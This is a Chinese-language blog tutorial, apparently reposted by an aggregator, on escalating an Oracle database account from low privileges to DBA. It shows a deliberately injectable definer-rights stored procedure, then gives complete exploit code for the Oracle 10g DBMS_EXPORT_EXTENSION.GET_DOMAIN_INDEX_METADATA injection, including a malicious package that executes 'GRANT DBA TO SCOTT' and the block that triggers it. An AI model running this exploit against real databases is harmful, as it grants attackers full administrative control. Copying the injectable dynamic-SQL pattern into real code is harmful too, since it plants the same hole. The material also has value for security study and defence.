Oracle数据库提权(低权限提升至dba)

Posted -qing-

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Oracle数据库提权(低权限提升至dba)相关的知识,希望对你有一定的参考价值。

0x01 Oracle存储过程缺陷

Oracle 的存储过程中,有一个有趣的特点:运行权限。运行权限分为两种,definer  invoker

 

definer 为函数创建者的权限,而 invoker 则是当前调用函数的用户。运行权限在函数创建时就已经被钦定了,默认为 definer

 


 

说白了,如果我们用低权限用户去运行DBA权限用户创建的存储过程,我们在调用时就可以额访问DBA资源,使用DBA的权限

 

 

 Oracle 这样做的初衷,实际上是为了用户互相访问资源时,避免用户凭据的问题。当然也可以将函数的权限定义为 invoker,但需要显式设置:

 

create or replace function Whoami return varchar2

AUTHID CURRENT_USER

begin NULL; end;

因为具有这样的特性,所以当存储过程函数实现存在缺陷时,安全问题就产生了

 

 

 

 




 

 

 

 

比如下面这里新建一个存储过程

create or replace procedure SasugaOracle(msg in varchar2)

as

stmt varchar2(255);

begin

    stmt := BEGIN DBMS_OUTPUT.PUT_LINE(‘‘‘ || msg || ‘‘‘) END;;

    EXECUTE IMMEDIATE stmt;

end;

 

 EXECUTE IMMEDIATE 用于动态执行 SQL 语句。首先使用 DBA 用户创建该过程并赋予所有人执行权限:

 

grant execute on SasugaOracle to public;

接着切换到普通用户,只有 CONNECT 和 RESOURCE 权限,执行存储过程:

技术图片

 

修改一下传入的参数这里我们在原命令后新增了一条添加数据库用户的命令,这里添加的用户名为latec0mer

技术图片

 

然后我们查询一下是否存在latec0mer这个用户,可以看到我们上一条新增的命令是生效的。

技术图片

类似的,如果 Oracle 的系统函数中存在同样的缺陷,我们便有机会对其加以利用,提升权限,甚至执行系统命令。

 

 

 

 

 

 

 

 

0x02 Oracle 10g 经典提权漏洞

 

Oracle 10g 中, GET_DOMAIN_INDEX_TABLES 函数存在注入漏洞,该函数位于 DBMS_EXPORT_EXTENSION 包中,执行权限隶属于 sys

 

 

scott/tiger登陆Oraclescott oracle内建用户,权限较低,我们就可以利用执行具有高权限的漏洞函数来达到提升数据库用户权限的目的。

 

sqlplus scott/tiger@orcl

 

技术图片

 

查询scott的当前角色

 

select * from session_roles;

 

 

 技术图片

 

可以看到scott只有CONNECTRESOURCE两个权限较低的角色

 

 

 

利用漏洞执行权限提升

Create or REPLACE

PACKAGE HACKERPACKAGE AUTHID CURRENT_USER

IS

FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env

SYS.odcienv)

RETURN NUMBER;

END;

/

 

 

技术图片

 

 

Create or REPLACE PACKAGE BODY HACKERPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env
SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE GRANT DBA TO SCOTT;
COMMIT;
RETURN(1);
END;
END;
/

 

技术图片

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := A1;
INDEX_SCHEMA := SCOTT;
TYPE_NAME := HACKERPACKAGE;
TYPE_SCHEMA := SCOTT;
VERSION := 10.2.0.1.0;
GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME =>
INDEX_NAME,
INDEX_SCHEMA=> INDEX_SCHEMA,
TYPE_NAME => TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA,
VERSION => VERSION,
NEWBLOCK => NEWBLOCK,
GMFLAGS => GMFLAGS);
END;
/

技术图片

 

现在我们再来看看权限

 

技术图片

 

 

成功从普通用户提权到dba用户。

 

 

 

 

ps:经测试,oracle10.2.0.4以上版本没这个安全漏洞

 

 

 

 

 

 

 

 

 

 

 

 

 

 

以上是关于Oracle数据库提权(低权限提升至dba)的主要内容,如果未能解决你的问题,请参考以下文章

17_服务器提权

如何通过DBMS_SQL获取DBA权限的

本地提权的学习

漏洞预警MySQL/MariaDB/PerconaDB-提权/条件竞争漏洞(附POC)

Linux权限提升—定时任务环境变量权限配置不当数据库等提权

权限提升和维持